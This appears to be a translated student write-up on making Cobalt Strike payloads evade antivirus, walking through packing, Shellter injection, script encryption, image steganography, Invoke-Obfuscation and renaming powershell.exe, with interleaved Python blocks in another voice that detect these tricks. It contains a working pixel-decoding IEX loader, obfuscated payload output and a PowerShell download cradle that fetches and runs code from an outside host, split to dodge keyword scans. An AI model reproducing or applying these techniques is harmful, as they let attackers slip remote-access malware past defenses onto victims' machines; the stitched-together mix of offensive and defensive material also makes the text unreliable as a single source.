
] FUD Payload Construction [

-==[ BJSDFZ Class 15 姜亚辰 ]==-

_____ __ ___ ____ _____


| __ \ /\\ \ / / | / __ \ /\ | __ \
| |__) / \\ \_/ /| | | | | | / \ | | | |
| ___/ /\ \\ / | | | | | |/ /\ \ | | | |
| | / ____ \| | | |___| |__| / ____ \| |__| |
|_| /_/ \_\_| |______\____/_/ \_\_____/
Friendly reminder: do not go playing around with what is in this file, or the FBI may come knocking

-==[ 0X01 Introduction


As everyone knows, during a penetration test an ordinary payload gets caught almost immediately.
Below are the evasion approaches I use most often......

-==[ 0X02 Index


1: Pack the binary with UPX, VMProtect (vmp) or another packer

2: Wrap it in another language such as Python, Go or EPL (易语言) (compatibility is somewhat worse; rejected)

3: Encrypt or obfuscate the shellcode (msfvenom's x86/shikata_ga_nai no longer works well)

4: Use a niche remote-control tool (Sunlogin, 向日葵)

5: PowerShell (this is the one we go with)

-==[ 0X03 Brief Overview


All information from tidesec:
https://imgconvert.csdnimg.cn/

-==[ 0X04 Tools

Cobalt Strike 4.0

Metasploit Framework

Invoke-Obfuscation

Kali Linux (WSL)
Invoke-PSImage

Shellter 7.2, Invoke-Xencrypt (used in the tests below)

VirusTotal, VirScan

-==[ 0X05 Starting the test


Update Windows 10 to the latest version

Install Windows Terminal and Kali Linux (WSL) for convenience

Open a Kali window and switch to root (sudo su)

Install the JDK (not the JRE): apt install openjdk-8-jdk

Clone the cracked build of Cobalt Strike locally (curl, wget or git all work)

Enter the folder and start the team server (./teamserver 192.168.xx.xx password)

Double-click cs.bat, fill in the server details and connect
Create a listener and generate a payload (artifact.exe)

Double-click it to run and check the connection (beacon checked in, remote beacon works)

Then throw it straight onto VT

Dead on arrival
] TYPE 1 [

Now add some seasoning: wrap it with UPX

First install UPX: apt install upx

┌──(root㉿A0L9E8X7-workstation)-[/mnt/c/Users/HP/Desktop]

└─# upx artifact.exe

Ultimate Packer for eXecutables

Copyright (C) 1996 - 2020

UPX 3.96 Markus Oberhumer, Laszlo Molnar & John Reiser Jan 23rd 2020

File size Ratio Format Name

-------------------- ------ ----------- -----------

artifact.exe [**************************************************] 19.1%

14336 -> 8192 57.14% win32/pe artifact.exe

Packed 1 file: 1 ok, 0 error.

Tested: still gets killed. (UPX is the packer every engine unpacks first: the default UPX0/UPX1 section names and a single high-entropy section identify it at a glance.)

Now swap the packer for VMProtect (vmp) and try again
A big step forward, but that is as far as it goes (probably because the VMProtect version is old and did not have much effect).

Getting past McAfee and Kaspersky still counts as a pleasant surprise; this is fine as cannon fodder, but it has to be tailored to the target's actual environment.

With my trash-tier skills, a FUD bare EXE is clearly out of reach, and the loaders floating around online get flagged hard too. Giving up on direct EXE evasion.
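Why UPX falls over so quickly can be seen without any AV at all. The Python below is an added example for this page, not the author's code: it walks a PE section table, flags the default UPX/VMProtect section names (the VMProtect names are an assumption drawn from common samples) and computes per-section entropy, the two cheapest static packer indicators a scanner applies. It builds its own minimal PE-shaped byte string so it runs offline; `build_sample_pe`, `packer_indicators` and the 7.0-bit threshold are this example's own choices.

```python
import math
import random
import struct

# Section names that UPX and VMProtect write into the PE section table.
# The VMProtect names are an assumption based on commonly reported samples;
# extend the set from your own corpus.
PACKER_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".vmp0", b".vmp1", b".vmp2"}


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for empty/constant data, close to 8.0 for random bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the section table and return [(name, raw_bytes)] for every section."""
    if pe[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found")
    coff = e_lfanew + 4
    # COFF header: Machine(2) NumberOfSections(2) ... SizeOfOptionalHeader(2) Characteristics(2)
    num_sections, size_of_optional = struct.unpack_from("<H12xH", pe, coff + 2)
    table = coff + 20 + size_of_optional
    sections = []
    for i in range(num_sections):
        # IMAGE_SECTION_HEADER: Name(8) VirtualSize VirtualAddress SizeOfRawData PointerToRawData ...
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", pe, table + 40 * i)
        sections.append((name.rstrip(b"\0"), pe[raw_ptr:raw_ptr + raw_size]))
    return sections


def packer_indicators(pe: bytes, entropy_threshold: float = 7.0) -> list:
    """Return human-readable reasons a static scanner would flag this file as packed."""
    findings = []
    for name, data in parse_sections(pe):
        label = name.decode("ascii", "replace")
        if name in PACKER_SECTION_NAMES:
            findings.append(f"{label}: known packer section name")
        ent = shannon_entropy(data)
        if ent >= entropy_threshold:
            findings.append(f"{label}: entropy {ent:.2f} >= {entropy_threshold}")
    return findings


def build_sample_pe(sections: list) -> bytes:
    """Construct a minimal PE-shaped byte string (DOS stub, COFF header, section
    table, section data) so the checker can run offline. It is NOT a runnable
    executable: the optional header is omitted (SizeOfOptionalHeader = 0)."""
    e_lfanew = 0x40
    dos_header = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff_header = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    raw_ptr = e_lfanew + 4 + 20 + 40 * len(sections)  # data starts right after the table
    table, body = b"", b""
    for name, data in sections:
        table += struct.pack("<8sIIIIIIHHI", name, len(data), 0x1000, len(data),
                             raw_ptr, 0, 0, 0, 0, 0x60000020)
        body += data
        raw_ptr += len(data)
    return dos_header + b"PE\0\0" + coff_header + table + body


# Constructed sample: a low-entropy .text section plus a UPX1 section filled with
# pseudo-random bytes, mimicking the compressed blob a packer leaves behind.
SAMPLE_PE = build_sample_pe([
    (b".text", bytes(range(16)) * 64),
    (b"UPX1", random.Random(7).randbytes(4096)),
])

if __name__ == "__main__":
    for line in packer_indicators(SAMPLE_PE):
        print(line)
```

Run it against a real UPX output with `packer_indicators(open("artifact.exe", "rb").read())`; both indicators fire on a default UPX build, which is why repacking alone never changes the verdict.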

] TYPE 2 [

Try injection-based evasion (representative tools: Shellter, Backdoor Factory)

Detection rate of the original file
Inject with Shellter:

[Shellter ASCII banner]                                          v7.2

www.ShellterProject.com

Choose Operation Mode - Auto/Manual (A/M/H): M

PE Target: C:\Users\HP\Desktop\DaLiuRen.exe

**********

* Backup *

**********

Backup: Shellter_Backups\DaLiuRen.exe

********************************

* PE Compatibility Information *
********************************

Minimum Supported Windows OS: 4.0

Note: It refers to the minimum required Windows version for the target

application to run. This information is taken directly from the

PE header and might be not always accurate.

******************

* Packed PE Info *

******************

Status: Possibly Not Packed - The EntryPoint is located in the first section!

***********************

* PE Info Elimination *

***********************

Data: Dll Characteristics (Dynamic ImageBase etc...), Digital Signature.

Status: All related information has been eliminated!

Gather Dynamic Thread Context Info? (Y/N/H): Y

Number of Instructions: 10

Check for SelfModifying Code while Tracing? (Y/N/H): Y

Pause Tracing at SelfModifying Code Detection? (Y/N/H): Y

Show Real-Time Tracing? (Y/N/H): Y

****************

* Tracing Mode *

****************

Status: Tracing has started! Press CTRL+C to interrupt tracing at any time.

DisASM.dll was created successfully!

The following PEB flags have been reset:

1. PEB.BeingDebugged

2. PEB.NtGlobalFlag
40145c jmp 0040146Eh <0>

40146e mov eax, dword ptr [004C508Bh] <1>

401473 shl eax, 02h <2>

401476 mov dword ptr [004C508Fh], eax <3>

40147b push edx <4>

40147c push 00000000h <5>

40147e call 004C3CC2h <6>

4c3cc2 jmp dword ptr [004E5388h] <7>

401483 mov edx, eax <8>

401485 call 004B6424h <9>

Tracing has been completed successfully!

Tracing Time Approx: 0.0171 mins.

Starting First Stage Filtering...

*************************

* First Stage Filtering *

*************************

Filtering Time Approx: 0 mins.

Enable Stealth Mode? (Y/N/H): N

Shellter couldn't access the selected file containing the payload

and/or the file is empty or too big!

Make sure that the file exists and that is not used by another process.

Max file path length: 260 chars.

************

* Payloads *

************

[1] Meterpreter_Reverse_TCP [stager]

[2] Meterpreter_Reverse_HTTP [stager]


[3] Meterpreter_Reverse_HTTPS [stager]

[4] Meterpreter_Bind_TCP [stager]

[5] Shell_Reverse_TCP [stager]

[6] Shell_Bind_TCP [stager]

[7] WinExec

Use a listed payload or custom? (L/C/H): C

Select Payload: C:\Users\HP\Desktop\aaaaaaaaaaaaaaaaaaaaaaaa.exe

Is this payload a reflective DLL loader? (Y/N/H): N

Is the Payload Encoded? (Y/N/H): N

Encode Payload with Shellter? (Y/N/H): Y

Encode Payload using DTCK? (Y/N/H): H

Info: Dynamic Thread Context Key.

Shellter will make use of gathered dynamic thread context information

as encoding key. This key doesn't have to be hardcoded, and it will

exist at the right moment during the execution of the infected PE file.

Note: Experimental feature.

Encode Payload using DTCK? (Y/N/H): Y

Obfuscate Shellter's Decoder? (Y/N/H): Y

Enable User Defined Encoding Sequence? (Y/N/H): N

******************

* Encoding Stage *

******************

Encoding Payload: Done!

****************************

* Assembling Decoder Stage *

****************************

Assembling Decoder: Done!


***********************************

* Binding Decoder & Payload Stage *

***********************************

Status: Obfuscating the Decoder using Thread Context Aware Polymorphic

code, and binding it with the payload.

Please wait...

Binding: Done!

Use IAT Handlers or Change Section's Permissions? (I/P/H): I

*********************

* IAT Handler Stage *

*********************
Fetching IAT Pointers to Memory Manipulation APIs...

0. VirtualAlloc --> IAT[4e5484]

1. VirtualAllocEx --> N/A

2. VirtualProtect --> N/A

3. VirtualProtectEx --> N/A

4. HeapCreate/HeapAlloc --> N/A

5. LoadLibrary/GetProcAddress --> IAT[4e5410]/IAT[4e5394]

6. GetModuleHandle/GetProcAddress --> IAT[4e5388]/IAT[4e5394]

7. CreateFileMapping/MapViewOfFile --> N/A

Choose one of the available methods: 6

****************

* Payload Info *

****************

Payload: C:\Users\HP\Desktop\aaaaaaaaaaaaaaaaaaaaaaaa.exe

Size: 15862 bytes

Reflective Loader: NO

Encoded-Payload Handling: Enabled

Handler Type: IAT

Obfuscate IAT Handler? (Y/N/H): Y

***************************

* IAT Handler Obfuscation *

***************************

Status: Binding the IAT Handler with Thread Context Aware Polymorphic code.

Please wait...

Code Generation Time Approx: 0 seconds.

Prepend PolyMorphic Code? (Y/N/H): Y

Prepend User/Engine PolyMorphic Code (U/E/H): E


Min Input: 20 Bytes

Max Input: 10000 Bytes

Size of PolyCode (Approx): 10000

*************************

* PolyMorphic Junk Code *

*************************

Type: Engine

Generating: ~10000 bytes of PolyMorphic Junk Code

Please wait...

Generated: 10000 bytes

Code Generation Time Approx: 0 seconds.

Starting Second Stage Filtering...

**************************

* Second Stage Filtering *

**************************

Filtering Time Approx: 0 mins.

Starting third stage filtering...

*************************

* Third Stage Filtering *

*************************

Filtering Time Approx: 0 mins.

Show Disassembled Entries? (Y/N/H): Y

Total Entries: 2

Valid Index Values: 0 - 1

Select Start Entry: 0

Select End Entry: 1

401483 mov edx, eax <0>


401485 call 004B6424h <1>

Show more entries? (Y/N): N

Total Entries: 2

Valid values: 0 <= value <= 1

Select <Index> of VA to Start Injection: 0

*******************

* Injection Stage *

*******************

Virtual Address: 0x401483

File Offset: 0xa83

Section: .text

Adjusting stub pointers to IAT...

Done!

Adjusting Call Instructions Relative Pointers...

Done!

Injection Completed!

*******************

* PE Checksum Fix *

*******************

Status: Valid PE Checksum has been set!

Original Checksum: 0x0

Computed Checksum: 0x1cf91b

**********************

* Verification Stage *

**********************

Info: Shellter will verify that the first instruction of the

injected code will be reached successfully.


If polymorphic code has been added, then the first

instruction refers to that and not to the effective

payload.

Max waiting time: 10 seconds.

Warning!

If the PE target spawns a child process of itself before

reaching the injection point, then the injected code will

be executed in that process. In that case Shellter won't

have any control over it during this test.

You know what you are doing, right? ;o)

Injection: Verified!

Press [Enter] to continue...

Threw it onto VT for a scan, and VT choked on it

Switched to VirScan and scanned again:

Perfect, not a single domestic AV caught it

Then ran it through VT once more: 5 of 70 engines, which is already pretty good (this is where I really felt how strong Windows Defender is).

Static evasion is not real evasion: you still have to account for the actual environment, minimize sensitive operations and avoid getting caught on behaviour.
That is as far as I can push EXEs...

] TYPE 3 [ PowerShell x Cobalt Strike: a match made in heaven

Advantages of PowerShell: nothing lands on disk, simple, practical, plenty of evasion tricks.

First look at the detection rate of the PowerShell payload Cobalt Strike generates by itself

Worlds apart from the EXE: even at its best it is 16 of 45 engines

Next, encrypt it with Invoke-Xencrypt:

PS C:\Users\HP\Desktop> Invoke-Xencrypt -InFile C:\Users\HP\Desktop\payload.ps1 -OutFile banana.ps1 -Iterations 20

Xencrypt Copyright (C) 2020 Xentropy ( @SamuelAnttila )

This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.

This is free software, and you are welcome to redistribute it

under certain conditions.

[*] Reading 'C:\Users\HP\Desktop\payload.ps1' ...


[*] Starting code layer ...

[*] Compressing ...

[*] Generating encryption key ...

[*] Encrypting ...

[*] Finalizing code layer ...

[*] Writing 'banana.ps1' ...

[+] Done!

PS C:\Users\HP\Desktop>

Then test it on VirScan:

That is already high for PowerShell; on to the next method..

New method: embed the script in an image, then drive it with the sal (Set-Alias) command

First download Invoke-PSImage locally

Then open PowerShell: Import-Module .\Invoke-PSImage.ps1

PS E:\recovery\Desktop\tools\crypt3r5> Invoke-PSImage -Script C:\Users\HP\Desktop\payload.ps1 -Image .\asd.png -Out C:\Users\HP\Desktop\play.png

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap("C:\Users\HP\Desktop\play.png");$o=a Byte[] 5120;(0..1)|%{foreach($x in(0..2559)){$p=$g.GetPixel($x,$_);$o[$_*2560+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3534]))

PS E:\recovery\Desktop\tools\crypt3r5>
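What the one-liner above actually does is read one script byte per pixel: the high nibble from the low four bits of Blue, the low nibble from the low four bits of Green, row by row. The Python below is an added example (not Invoke-PSImage's code) that reproduces that layout on a constructed pseudo-random cover image, shows why the picture survives visually (the top four bits of every channel are untouched) and adds a printable-ASCII triage check a defender can run over a suspect PNG. `make_cover`, `SCRIPT`, `printable_fraction` and the roughly 0.38-versus-1.0 figures are this example's own assumptions; plug a real image in as rows of (R, G, B) tuples.

```python
import random

# Constructed stand-in for the script one would hide; not a payload from the page.
SCRIPT = b"Write-Host 'constructed sample script'\n" * 20


def make_cover(width: int, height: int, seed: int = 0) -> list:
    """Constructed pseudo-random RGB cover image: a list of rows of (R, G, B) tuples."""
    rng = random.Random(seed)
    return [[(rng.randrange(256), rng.randrange(256), rng.randrange(256))
             for _ in range(width)] for _ in range(height)]


def embed(script: bytes, cover: list) -> list:
    """Hide one script byte per pixel: high nibble in the low 4 bits of B,
    low nibble in the low 4 bits of G, row-major from the top-left pixel.
    This is exactly the layout the page's one-liner reads back."""
    width = len(cover[0])
    if len(script) > width * len(cover):
        raise ValueError("cover image too small for script")
    stego = [list(row) for row in cover]
    for i, byte in enumerate(script):
        y, x = divmod(i, width)
        r, g, b = stego[y][x]
        stego[y][x] = (r, (g & 0xF0) | (byte & 0x0F), (b & 0xF0) | (byte >> 4))
    return stego


def extract(img: list, length: int) -> bytes:
    """Python form of the one-liner's loop: ((B -band 15) * 16) -bor (G -band 15)."""
    width = len(img[0])
    out = bytearray()
    for i in range(length):
        y, x = divmod(i, width)
        _r, g, b = img[y][x]
        out.append(((b & 0x0F) << 4) | (g & 0x0F))
    return bytes(out)


def high_bits_untouched(cover: list, stego: list) -> bool:
    """Why the picture still looks normal: R is unchanged and only the low nibble
    of G and B moves, i.e. at most a +/-15 shift per channel."""
    for row_c, row_s in zip(cover, stego):
        for (r1, g1, b1), (r2, g2, b2) in zip(row_c, row_s):
            if r1 != r2 or (g1 & 0xF0) != (g2 & 0xF0) or (b1 & 0xF0) != (b2 & 0xF0):
                return False
    return True


def printable_fraction(img: list, length: int) -> float:
    """Triage heuristic: decode the first `length` bytes with the same nibble layout
    and measure how many are printable ASCII. Random low nibbles give about 0.38
    (98 printable values out of 256); a hidden text script gives close to 1.0."""
    data = extract(img, length)
    printable = sum(1 for c in data if 0x20 <= c < 0x7F or c in b"\t\r\n")
    return printable / max(1, length)


COVER = make_cover(width=256, height=4, seed=1)
STEGO = embed(SCRIPT, COVER)

if __name__ == "__main__":
    print(extract(STEGO, len(SCRIPT)) == SCRIPT)
    print(round(printable_fraction(COVER, 512), 2), round(printable_fraction(STEGO, len(SCRIPT)), 2))
```

The carrier is the weak part, not the trick: the image itself is inert, so detection moves to the stub that decodes it, which is why the next step in the text is to test the run command rather than the PNG.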

nice!

Completely FUD, but no hurry: first check whether the command that runs it is flagged.

Detection rate 2 of 45 engines, not bad. Ran it through Xencrypt once more, but it stayed at 2 of 45; Xencrypt's signature has presumably been pinned down already.

Switch to Invoke-Obfuscation and try again

Tool :: Invoke-Obfuscation

Author :: Daniel Bohannon (DBO)

Twitter :: @danielhbohannon

Blog :: http://danielbohannon.com

Github :: https://github.com/danielbohannon/Invoke-Obfuscation

Version :: 1.8

License :: Apache License, Version 2.0

Notes :: If(!$Caffeinated) {Exit}

HELP MENU :: Available options shown below:

[*] Tutorial of how to use this tool TUTORIAL

[*] Show this Help Menu HELP,GET-HELP,?,-?,/?,MENU


[*] Show options for payload to obfuscate SHOW OPTIONS,SHOW,OPTIONS

[*] Clear screen CLEAR,CLEAR-HOST,CLS

[*] Execute ObfuscatedCommand locally EXEC,EXECUTE,TEST,RUN

[*] Copy ObfuscatedCommand to clipboard COPY,CLIP,CLIPBOARD

[*] Write ObfuscatedCommand Out to disk OUT

[*] Reset ALL obfuscation for ObfuscatedCommand RESET

[*] Undo LAST obfuscation for ObfuscatedCommand UNDO

[*] Go Back to previous obfuscation menu BACK,CD ..

[*] Quit Invoke-Obfuscation QUIT,EXIT

[*] Return to Home Menu HOME,MAIN

Choose one of the below options:

[*] TOKEN Obfuscate PowerShell command Tokens

[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)

[*] STRING Obfuscate entire command as a String

[*] ENCODING Obfuscate entire command via Encoding

[*] COMPRESS Convert entire command to one-liner and Compress

[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)

Invoke-Obfuscation> set scriptpath C:\Users\HP\Desktop\banana.ps1

Successfully set ScriptPath:

C:\Users\HP\Desktop\banana.ps1

Choose one of the below options:

[*] TOKEN Obfuscate PowerShell command Tokens

[*] AST Obfuscate PowerShell Ast nodes (PS3.0+)

[*] STRING Obfuscate entire command as a String

[*] ENCODING Obfuscate entire command via Encoding

[*] COMPRESS Convert entire command to one-liner and Compress

[*] LAUNCHER Obfuscate command args w/Launcher techniques (run once at end)
Invoke-Obfuscation> encoding

Choose one of the below Encoding options to APPLY to current payload:

[*] ENCODING\1 Encode entire command as ASCII

[*] ENCODING\2 Encode entire command as Hex

[*] ENCODING\3 Encode entire command as Octal

[*] ENCODING\4 Encode entire command as Binary

[*] ENCODING\5 Encrypt entire command as SecureString (AES)

[*] ENCODING\6 Encode entire command as BXOR

[*] ENCODING\7 Encode entire command as Special Characters

[*] ENCODING\8 Encode entire command as Whitespace

Invoke-Obfuscation\Encoding> 5

Executed:

CLI: Encoding\5

FULL: Out-SecureStringCommand -ScriptBlock $ScriptBlock -PassThru

Result:

( [RuNTime.iNTerOpSERVICes.MarsHal]::pTRtoStRingAnSi( [RuntiME.iNTErOpSERviCEs.marS
Hal]::sECurEstrIngTOGLOBalALloCansi($('76492d1116743f0423413b16050a5345MgB8AHoAdABJ
AFUAUABYAC8AdwBqAHYAOABOAGYAQgBHACsAVwBkAEgATwB5AEEAPQA9AHwAZgA43ADMANABiADYANAAyAG
MAOABlAGMANAA2AGQAOAAzAGIAMQBmAGQAYQA4ADUAOQAyAGMANAA5ADgAZQBjADgAYwAzAGQAMABmAGIAN
QA2ADIAZgA1ADcANwAwAGQAZABhADUAZAA1ADYAYQA1ADAANAA2ADgAMABjAGEANgBjADUAZQAxADIAYwBm
AGYAYwBhADAAYgAxADcAMAA3ADQAYQA2ADcAYQAyADEANgBmAGYAYwAzAGYAOABiAGMANgAwADgAYwAxAGU
ANQAyAGEANwBkADIAOAAxAGUAZABhADIAOQBlADUANAAxADgAMwAwADkAZgBkADEAMAAxAGYANgA3AA=='
| CoNvERTTO-SeCUreSTRInG -K (144..167))) ) )| &( $SHEllId[1]+$sheLlId[13]+'x')

Choose one of the below Encoding options to APPLY to current payload:

[*] ENCODING\1 Encode entire command as ASCII

[*] ENCODING\2 Encode entire command as Hex

[*] ENCODING\3 Encode entire command as Octal

[*] ENCODING\4 Encode entire command as Binary

[*] ENCODING\5 Encrypt entire command as SecureString (AES)

[*] ENCODING\6 Encode entire command as BXOR


[*] ENCODING\7 Encode entire command as Special Characters

[*] ENCODING\8 Encode entire command as Whitespace

Invoke-Obfuscation\Encoding> 7

Executed:

CLI: Encoding\7

FULL: Out-EncodedSpecialCharOnlyCommand -ScriptBlock $ScriptBlock -PassThru

Result:

${!+-}=+$( ) ; ${]} =${!+-} ;${-``@}=++ ${!+-} ;${+%}= ( ${!+-} =


${!+-}+ ${-``@}); ${``*} = ( ${!+-} =${!+-}+ ${-``@} ) ;${)+/} = (${!+-}
=${!+-}+ ${-``@} ); ${#}= (${!+-} = ${!+-}+${-``@} );${``'@}=( ${!+-}=
${!+-} + ${-``@}) ; ${=} = ( ${!+-}= ${!+-} + ${-``@}) ;${``} =
( ${!+-}= ${!+-} + ${-``@} ); ${/#}= (${!+-}=${!+-} +${-``@} ); ${``@'}
="["+"$(@{})"[ ${=}]+"$(@{})"["${-``@}"+ "${/#}" ]+"$(@{} ) "[ "${+%}" +
"${]}" ]+ "$? "[ ${-``@}]+ "]" ;${!+-} ="".("$( @{ } )"[ "${-``@}"+
"${)+/}" ]+ "$(@{} ) "["${-``@}"+ "${``'@}" ] +"$(@{ }) "[ ${]} ]
+"$( @{})"[ ${)+/}]+ "$? "[ ${-``@}] +"$( @{} )"[ ${``*}]) ;${!+-}
="$( @{})"[ "${-``@}" + "${)+/}" ] +"$(@{ }) "[${)+/}]+"${!+-}"["${+%}"
+"${=}"];"${!+-} (${``@'}${)+/}${]}+ ${``@'}${``*}${+%}+${``@'}${/#}${-``@} +
${``@'}${``}${+%} +${``@'}${-``@}${-``@}${=} + ${``@'}${=}${``}#}${``*} +
${``@'}${)+/}${``*} + ${``@'}${``*}${``'@} +${``@'}${-``@}${-``@}${#}+
${``@'}${-``@}${]}${)+/} + ${``@'}${-``@}${]}${-``@} +${``@'}${=}${``'@} +
${``@'}${-``@}${]}${``}+ ${``@'}${=}${``*} +${``@'}${-
``@}${]}${]}+${``@'}${/#}${-``@}+${``@'}${)+/}${/#}+ ${``@'}${#}${-``@} +
${``@'}${/#}${``*} + ${``@'}${)+/}${``*}+ ${``@'}${``*}${/#} +${``@'}${-
``@}${+%}${]}+ ${``@'}${``*}${/#} +${``@'}${)+/}${-``@} ) "| & ${!+-}

WARNING: This command exceeds the cmd.exe maximum length of 8190.

Its length is 81808 characters.

Choose one of the below Encoding options to APPLY to current payload:

[*] ENCODING\1 Encode entire command as ASCII

[*] ENCODING\2 Encode entire command as Hex

[*] ENCODING\3 Encode entire command as Octal

[*] ENCODING\4 Encode entire command as Binary

[*] ENCODING\5 Encrypt entire command as SecureString (AES)

[*] ENCODING\6 Encode entire command as BXOR


[*] ENCODING\7 Encode entire command as Special Characters

[*] ENCODING\8 Encode entire command as Whitespace

Invoke-Obfuscation\Encoding> out C:\Users\HP\Desktop\banana3.ps1

Successfully output ObfuscatedCommand to C:\Users\HP\Desktop\banana3.ps1.

Now it is completely clean: it gets onto the machine without a sound.

-==[ 0X06 How It Ends ......


Typing these commands inevitably invokes PowerShell, and AV is very aggressive about blocking PowerShell. For this situation we have to give the PowerShell command some special treatment.

AV detection of PowerShell roughly falls into the following categories

1: AV inspects the parameters and functions in the PowerShell command

2: AV detects the actions PowerShell performs

3: AMSI (bypass it with an instruction generated on https://amsi.fail)

For the first, use syntax tricks to split the keywords in the command (e.g. http, IEX). After splitting it looks like: ...downloadstring(''ht';$b='tp://109.xx.xx.xx/a'')';IEX ($a+$b) (the first half ends up in $a, the second in $b, and IEX evaluates the re-joined string)

The second is harder to handle, because it blocks the powershell program itself. Such foul play we cannot tolerate.

This kind of block can be bypassed with the copy command. The principle: the AV will not let us use powershell, so we copy powershell.exe to another folder and rename it. This class of AV checks for the string powershell.exe in the process name; change it and it naturally waves us through...

Caveat: this only beats detection keyed on the image name. Anything that looks at the PE version resource (OriginalFileName, which Sysmon logs), the file hash or the signer still sees powershell.exe, and AMSI still loads into the renamed copy.

copy C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe backs.ps1.exe

// Named .ps1 here because the PowerShell icon is hard to change.

Then run backs.ps1.exe.

C:\Users\HP>copy C:\Windows\System32\WindowsPowershell\v1.0\powershell.exe backs.ps1.exe

        1 file(s) copied.

C:\Users\HP>backs.ps1.exe

Windows PowerShell

Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Users\HP> cd

NICE!

Extra-long commands with $-style concatenation are also worth trying (-w is -WindowStyle; the fifty repeats only pad the command line, the real work is the aliased IEX and the split 'ht'+'tp' string):

powershell.exe -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal
-w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal
-w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal
-w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal
-w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal -w Normal
set-alias -name key -value IEX; key(New-Object Net.WebClient).DownloadString('ht'+'tp://x.x.x.x/a')
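Every trick in this section is cosmetic, so the check a detection engineer wants is a normalizer that strips them before matching. The Python below is an added example, not from the page or the posts it references: it collapses repeated `-w Normal` padding, folds `'ht'+'tp'` string concatenation, resolves `set-alias`/`sal` aliases, then matches plain signatures, and it catches the renamed interpreter by comparing the on-disk name with the PE version resource's OriginalFileName. The events are constructed in the shape of Sysmon Event ID 1 fields; that Sysmon reports `PowerShell.EXE` as OriginalFileName for powershell.exe is an assumption to verify against your own telemetry.

```python
import ntpath
import re

# Constructed events in the shape of Sysmon Event ID 1 (process creation) fields.
# Sample data written for this example, not logs from the page.
SAMPLE_EVENTS = [
    {   # the padded, concatenated, aliased one-liner from the text
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",   # assumed version-resource value
        "CommandLine": "powershell.exe " + "-w Normal " * 40
        + "set-alias -name key -value IEX; key(New-Object Net.WebClient)"
          ".DownloadString('ht'+'tp://x.x.x.x/a')",
    },
    {   # the copied-and-renamed interpreter from the text
        "Image": r"C:\Users\HP\backs.ps1.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": "backs.ps1.exe",
    },
    {   # benign control
        "Image": r"C:\Windows\System32\notepad.exe",
        "OriginalFileName": "NOTEPAD.EXE",
        "CommandLine": "notepad.exe readme.txt",
    },
]

# an argument pair ("-w Normal") immediately repeated one or more times
_REPEAT = re.compile(r"(-\w+\s+\w+)(?:\s+\1)+")
# two adjacent quoted literals joined with "+", e.g. 'ht'+'tp://...'
_CONCAT = re.compile(r"""(['"])([^'"]*)\1\s*\+\s*(['"])([^'"]*)\3""")
# set-alias -name X -value Y   or   sal X Y   (with an optional trailing ';')
_ALIAS = re.compile(
    r"(?:set-alias\s+-name\s+(\w+)\s+-value\s+([\w-]+)|\bsal\s+(\w+)\s+([\w-]+))\s*;?\s*",
    re.IGNORECASE)

# plain substrings to look for once the cosmetics are gone (lowercase)
SIGNATURES = ("iex", "invoke-expression", "downloadstring", "net.webclient",
              "http://", "-encodedcommand", "frombase64string")


def normalize_commandline(cmd: str) -> str:
    """Undo the three cosmetic tricks from the text before signature matching."""
    # 1. "-w Normal -w Normal ..." padding: keep a single copy of the repeated pair
    cmd = _REPEAT.sub(r"\1", cmd)
    # 2. 'ht'+'tp://...': fold adjacent literals until nothing changes (handles chains)
    while True:
        folded = _CONCAT.sub(lambda m: m.group(1) + m.group(2) + m.group(4) + m.group(1), cmd)
        if folded == cmd:
            break
        cmd = folded
    # 3. set-alias / sal: drop the aliasing statement, substitute the real cmdlet name
    for m in list(_ALIAS.finditer(cmd)):
        alias = m.group(1) or m.group(3)
        target = m.group(2) or m.group(4)
        cmd = cmd.replace(m.group(0), "", 1)
        cmd = re.sub(rf"\b{re.escape(alias)}\b", lambda _: target, cmd)
    return cmd


def analyze(event: dict) -> list:
    """Return the findings for one process-creation event."""
    findings = []
    image_name = ntpath.basename(event["Image"]).lower()
    original = event.get("OriginalFileName", "").lower()
    # Renamed interpreter: the file name on disk changed, the version resource did not.
    if original == "powershell.exe" and image_name != original:
        findings.append(f"powershell.exe renamed to {image_name}")
    norm = normalize_commandline(event["CommandLine"]).lower()
    for sig in SIGNATURES:
        if sig in norm:
            findings.append(f"signature {sig!r} after normalization")
    return findings


if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ntpath.basename(ev["Image"]), "->", analyze(ev) or "clean")
```

The point of the normalizer is that none of the tricks survive a single pass: the padding, the split string and the alias are all removed before the signatures are even consulted, and the renamed binary is caught by a field the rename never touched.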

Of course, besides the methods above there are other ways to bypass, for example packaging the PowerShell command into an EXE using C, Python, Go and so on, with detection rates roughly C > Python > Go.
"Of course, young people should have martial virtue; do not use the methods above for things that lack it, or else, bam, very fast, and before you know it you're locked up." ------ some big shot

Thanks to the teachers and classmates for reading

